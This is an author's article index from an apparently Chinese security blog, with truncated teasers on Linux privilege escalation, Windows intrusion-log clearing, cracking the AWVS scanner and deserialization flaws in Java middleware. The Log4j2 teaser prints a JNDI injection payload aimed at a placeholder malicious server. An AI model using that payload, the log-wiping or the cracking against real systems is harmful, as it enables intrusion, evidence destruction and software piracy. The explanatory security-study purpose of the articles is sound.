Loading ...

作者: lang 朗

103 篇文章

Linux 提权的几种常用姿势
一、内核漏洞提权 内核漏洞是 Linux 提权的经典途径,其中 “脏牛(Dirty Cow)” 漏洞因影响范围广而具有代表性。 (一)漏洞简介 CVE 编号:CVE-2016-5195 原理:Linux 内核处理 “写入复制(copy-on-write)” 机制时存在竞争条件,允许恶意用户对只读内存映射进行写访问,进而篡改系统文件(如/etc/pa…
Windows 入侵痕迹清理
一、Windows 日志清理 1. 系统核心日志 Windows 系统的日志详细记录了系统运行过程中的各种事件,是追踪入侵行为的重要依据。核心日志主要包括应用程序日志、系统日志和安全日志,它们分别存储在特定路径下: 应用程序日志:位于%SystemRoot%\System32\Winevt\Logs\Application.evtx,记录应用程序运…
thumbnail
AWVS(Acunetix Web Vulnerability Scanner)安装与破解
一、文档说明 工具定位:AWVS 是经典商业级 Web 漏洞扫描工具,本文档整理其 Windows、Linux 及 MacOS(推荐 Docker)系统的安装与破解步骤。 资源来源:破解工具及后续更新参考 Pwn3rzs 大神频道(https://t.me/Pwn3rzs ),致敬其共享精神。 风险提示:Linux 系统操作中涉及文件权限修改、系统…
中间件漏洞面试题
1. 中间件概念是什么? 中间件是位于操作系统和应用程序之间的软件层,用于提供通用服务(如通信、数据处理、安全等),简化分布式系统开发。它屏蔽底层复杂性,使应用程序更易集成、扩展和维护,常见于企业级应用、Web 服务和分布式系统。 2. 常见的中间件有哪些? Web 服务器:Apache HTTP Server、Nginx、IIS(Internet…
thumbnail
Struts2 远程代码执行漏洞(S2-059)深度剖析
一、漏洞概述 1. 漏洞描述 Struts2 是 Apache 推出的基于 MVC 模式的轻量级 Web 框架,在处理标签属性(如id)值时,会将用户可控参数直接作为OGNL 表达式解析。攻击者可构造恶意 OGNL 表达式注入标签属性,框架解析时执行表达式中的恶意代码,导致远程代码执行(RCE)。 2. OGNL 表达式基础 定义:Object-G…
thumbnail
JBoss 反序列化漏洞深度解析:从 CVE-2017-12149 到 CVE-2017-7504
一、JBoss 概述 1. 基本介绍 JBoss 是 Red Hat 公司维护的开源 Java EE 应用服务器,支持企业级功能如 EJB(企业组件)、JMS(消息服务)、JNDI(命名服务)等,常见版本包括 JBoss AS、WildFly、JBoss EAP,广泛应用于企业级系统。 2. 反序列化漏洞背景 JBoss 部分组件(如 HttpIn…
thumbnail
WebLogic T3 反序列化漏洞深度剖析:从协议原理到攻防实践
一、漏洞概述 WebLogic 是 Oracle 推出的 Java 应用服务器,其专有通信协议T3 协议因存在反序列化缺陷,成为远程代码执行漏洞的重灾区。攻击者可构造恶意序列化数据,通过 T3 协议发送给 WebLogic 服务器,在服务器反序列化过程中执行任意代码,实现远程控制。 历史上基于 T3 协议的高危漏洞包括 CVE-2015-4582、…
thumbnail
Apache Shiro 反序列化漏洞全解析:从 550 到 721 的攻防对抗
一、Apache Shiro 漏洞概述 Apache Shiro 是一款流行的 Java 安全框架,提供身份认证、授权、会话管理等功能。但其历史版本中存在两个高危反序列化漏洞 ——Shiro 550(CVE-2016-4437) 和Shiro 721,攻击者可利用漏洞实现远程代码执行,对 Java 应用造成严重威胁。 二、Shiro 550 反序列…
thumbnail
Fastjson 反序列化漏洞解析
一、Fastjson 概述 (一)基本介绍 Fastjson 是阿里巴巴开源的高性能 JSON 解析库,支持 Java 对象与 JSON 字符串的快速转换,因速度快、API 简洁、功能完备等特点,被广泛应用于缓存序列化、协议交互等场景。 (二)核心功能 序列化:通过JSON.toJSONString(obj)将 Java 对象转换为 JSON 字符…
thumbnail
Apache Log4j2 远程代码执行漏洞全解析
Apache Log4j2 远程代码执行漏洞全解析 一、漏洞概述 1. 漏洞原理 Apache Log4j2 是 Java 生态中广泛使用的日志框架,其Lookup功能存在致命缺陷:未限制 JNDI(Java 命名和目录接口)查询。攻击者可在日志消息中插入恶意 JNDI 表达式(如${jndi:rmi://恶意服务器/恶意类}),触发 Log4j2…